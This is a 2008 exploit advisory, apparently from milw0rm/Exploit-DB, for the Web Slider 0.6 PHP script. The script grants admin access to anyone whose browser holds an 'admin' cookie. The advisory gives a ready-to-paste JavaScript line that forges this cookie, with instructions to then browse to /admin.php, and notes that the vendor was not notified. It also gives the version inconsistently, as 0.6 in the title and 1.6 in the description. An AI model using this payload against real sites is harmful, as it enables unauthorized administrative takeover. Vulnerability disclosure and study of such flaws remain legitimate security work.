Web Slider 0.6 - Insecure Cookie/Authentication Handling

EDB-ID:

5629

Author:

t0pP8uZz

Type:

webapps

Platform:

PHP

Published:

2008-05-15

--==+================================================================================+==--
--==+		 Web Slider <= 0.6 Insecure Cookie/Authentication Handling	     +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz
Discovered On: 15 MAY 2008
Script Download: http://sourceforge.net/projects/webslider/
DORK: N/A



Vendor Has Not Been Notified!



DESCRIPTION:

Web Slider 1.6 (and prior), suffers from insecure cookie handling, when a admin logs in successfully a
cookie is created so admin doesnt have to login everypage, the bad thing is the coding is poor and the script
only checks to see if the cookie exists, it doesnt contain any password or anything.

so all we need to do is create a cookie so it makes us look like admin, the below javascript will do just that.



Exploit:

javascript:document.cookie = "admin=1; path=/";



NOTE/TIP: 

after pasting the above javascript code in your browser on a affected domain, you will be able to goto
"/admin.php" and access it as if you were a admin.

this should come to your attention how many web-developers are very bad coders. and leave massive
easy-to-fix holes like this in there scripts.

just remember when downloading a file of any kind to read through its source, and make sure its secure



GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !



peace, t0pP8uZz



--==+================================================================================+==--
--==+		 Web Slider <= 0.6 Insecure Cookie/Authentication Handling	     +==--
--==+================================================================================+==--

# milw0rm.com [2008-05-15]